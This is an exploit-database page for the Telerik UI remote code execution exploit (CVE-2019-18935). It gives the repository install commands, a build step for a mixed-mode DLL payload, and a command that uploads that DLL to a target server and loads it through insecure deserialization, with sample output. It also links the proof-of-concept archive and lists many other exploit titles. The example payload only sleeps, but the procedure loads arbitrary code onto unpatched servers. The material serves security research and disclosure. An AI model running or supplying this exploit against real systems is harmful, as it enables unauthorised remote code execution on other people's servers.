Menu

Search for hundreds of thousands of exploits

"Telerik UI - Remote Code Execution via Insecure Deserialization"

Author

Exploit author

"Bishop Fox"

Platform

Exploit platform

aspx

Release date

Exploit published date

2019-12-18

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).

Install
git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
python3 -m venv env
source env/bin/activate
pip3 install -r requirements.txt

Requirements
This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.

Usage
Compile mixed mode assembly DLL payload
In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.

build_dll.bat sleep.c
Upload and load payload into application via insecure deserialization
Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.

python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll
[*] Local payload name:  sleep_2019121205271355_x86.dll
[*] Destination folder:  C:\Windows\Temp
[*] Remote payload name: 1576142987.918625.dll

{'fileInfo': {'ContentLength': 75264,
              'ContentType': 'application/octet-stream',
              'DateJson': '1970-01-01T00:00:00.000Z',
              'FileName': '1576142987.918625.dll',
              'Index': 0},
 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
                                     'Telerik.Web.UI, Version=<VERSION>, '
                                     'Culture=neutral, '
                                     'PublicKeyToken=<TOKEN>',
              'TempFileName': '1576142987.918625.dll'}}

[*] Triggering deserialization...

<title>Runtime Error</title>
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
...omitted for brevity...

[*] Response time: 13.01 seconds
In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).

Thanks
@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.

Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip
Release DateTitleTypePlatformAuthor
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-24"UliCMS 2020.1 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-24"Wordpress Plugin WPForms 1.5.8.2 - Persistent Cross-Site Scripting"webappsphp"Jinson Varghese Behanan"
2020-03-24"Veyon 4.3.4 - 'VeyonService' Unquoted Service Path"localwindows"Víctor García"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
Release DateTitleTypePlatformAuthor
2020-02-24"DotNetNuke 9.5 - File Upload Restrictions Bypass"webappsaspx"Sajjad Pourali"
2020-02-24"DotNetNuke 9.5 - Persistent Cross-Site Scripting"webappsaspx"Sajjad Pourali"
2019-12-18"Telerik UI - Remote Code Execution via Insecure Deserialization"webappsaspx"Bishop Fox"
2019-12-17"NopCommerce 4.2.0 - Privilege Escalation"webappsaspx"Alessandro Magnosi"
2019-12-16"Roxy Fileman 1.4.5 - Directory Traversal"webappsaspx"Patrik Lantz"
2019-11-12"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting"webappsaspxCy83rl0gger
2019-11-12"Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting"webappsaspxCy83rl0gger
2019-11-12"Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting"webappsaspxCy83rl0gger
2019-11-05"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection"webappsaspx"Fabian Mosch_ Nick Theisinger"
2019-09-25"Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting"webappsaspx"Davide Cioccia"
2019-07-11"Sitecore 9.0 rev 171002 - Persistent Cross-Site Scripting"webappsaspx"Owais Mehtab"
2019-06-25"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal"webappsaspx"Aaron Bishop"
2019-06-20"BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection"webappsaspx"Aaron Bishop"
2019-06-19"BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution"webappsaspx"Aaron Bishop"
2019-06-19"BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution"webappsaspx"Aaron Bishop"
2019-06-13"Sitecore 8.x - Deserialization Remote Code Execution"webappsaspx"Jarad Kopf"
2019-02-12"BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution"webappsaspx"Dustin Cobb"
2019-01-14"Umbraco CMS 7.12.4 - Authenticated Remote Code Execution"webappsaspx"Gregory Draperi"
2018-10-29"Library Management System 1.0 - 'frmListBooks' SQL Injection"webappsaspx"Ihsan Sencan"
2018-10-24"Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting"webappsaspx"Dino Barlattani"
2018-10-10"Ektron CMS 9.20 SP2 - Improper Access Restrictions"webappsaspxalt3kx
2018-08-06"Sitecore.Net 8.1 - Directory Traversal"webappsaspxChris
2018-06-04"EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting"webappsaspx"Chris Barretto"
2018-03-13"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities"webappsaspx"SEC Consult"
2018-02-02"IPSwitch MOVEit 8.1 < 9.4 - Cross-Site Scripting"webappsaspx1n3
2018-01-24"Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Arbitrary File Upload"webappsaspx"Paul Taylor"
2018-01-24"Telerik UI for ASP.NET AJAX 2012.3.1308 < 2017.1.118 - Encryption Keys Disclosure"webappsaspx"Paul Taylor"
2017-12-27"DotNetNuke DreamSlider 01.01.02 - Arbitrary File Download (Metasploit)"webappsaspx"Glafkos Charalambous"
2017-11-16"LanSweeper 6.0.100.75 - Cross-Site Scripting"webappsaspx"Miguel Mendez Z"
2017-09-27"SmarterStats 11.3.6347 - Cross-Site Scripting"webappsaspxsqlhacker
Release DateTitleTypePlatformAuthor
2019-12-18"Telerik UI - Remote Code Execution via Insecure Deserialization"webappsaspx"Bishop Fox"
2019-02-05"OpenMRS Platform < 2.24.0 - Insecure Object Deserialization"webappsjava"Bishop Fox"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47793/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse